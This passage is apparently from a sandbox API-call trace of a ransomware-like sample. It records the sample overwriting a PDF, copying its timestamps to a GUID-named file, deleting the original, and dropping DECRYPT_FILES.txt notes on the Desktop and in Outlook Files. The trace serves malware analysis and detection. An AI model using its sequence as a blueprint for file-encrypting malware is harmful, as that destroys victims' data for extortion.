lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.348] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.349] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.349] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.350] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.351] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.352] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.352] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.353] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.353] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x600, lpOverlapped=0x0) returned 1 [0071.353] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.431] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.432] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.433] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.434] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.434] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.435] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.436] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.437] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.437] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.438] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x600, lpOverlapped=0x0) returned 1 [0071.438] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.438] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.439] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.441] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0071.441] SetEndOfFile (hFile=0x398) returned 1 [0071.442] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0071.442] CloseHandle (hObject=0x398) returned 1 [0071.442] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.442] GetFileType (hFile=0x398) returned 0x1 [0071.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.442] GetFileType (hFile=0x398) returned 0x1 [0071.442] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee6a8, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.442] CloseHandle (hObject=0x398) returned 1 [0071.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.443] GetFileType (hFile=0x398) returned 0x1 [0071.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.443] GetFileType (hFile=0x398) returned 0x1 [0071.443] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee6a8, lpLastWriteTime=0x0) returned 1 [0071.443] CloseHandle (hObject=0x398) returned 1 [0071.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.443] GetFileType (hFile=0x398) returned 0x1 [0071.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.443] GetFileType (hFile=0x398) returned 0x1 [0071.443] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee6a8) returned 1 [0071.443] CloseHandle (hObject=0x398) returned 1 [0071.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.444] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf")) returned 1 [0071.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", lpFilePart=0x0) returned 0x5b [0071.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.445] GetFileType (hFile=0x398) returned 0x1 [0071.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.445] GetFileType (hFile=0x398) returned 0x1 [0071.445] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee748, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.445] CloseHandle (hObject=0x398) returned 1 [0071.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", lpFilePart=0x0) returned 0x5b [0071.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.446] GetFileType (hFile=0x398) returned 0x1 [0071.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.446] GetFileType (hFile=0x398) returned 0x1 [0071.446] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee748, lpLastWriteTime=0x0) returned 1 [0071.446] CloseHandle (hObject=0x398) returned 1 [0071.446] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", lpFilePart=0x0) returned 0x5b [0071.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.446] GetFileType (hFile=0x398) returned 0x1 [0071.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.446] GetFileType (hFile=0x398) returned 0x1 [0071.446] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee748) returned 1 [0071.446] CloseHandle (hObject=0x398) returned 1 [0071.447] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x4c [0071.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0071.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x398 [0071.447] GetFileType (hFile=0x398) returned 0x1 [0071.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0071.447] GetFileType (hFile=0x398) returned 0x1 [0071.447] WriteFile (in: hFile=0x398, lpBuffer=0x2338ba0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x2338ba0*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0071.448] CloseHandle (hObject=0x398) returned 1 [0071.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0071.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.589] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.356] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.302] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.474] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.723] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.061] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0076.114] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0076.114] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0076.114] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.154] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.154] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0076.154] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0076.154] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0076.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0076.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0076.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0076.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0076.155] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.155] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.155] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0076.155] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0076.155] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0076.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0076.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x47 [0076.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0076.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\DECRYPT_FILES.txt" (normalized: 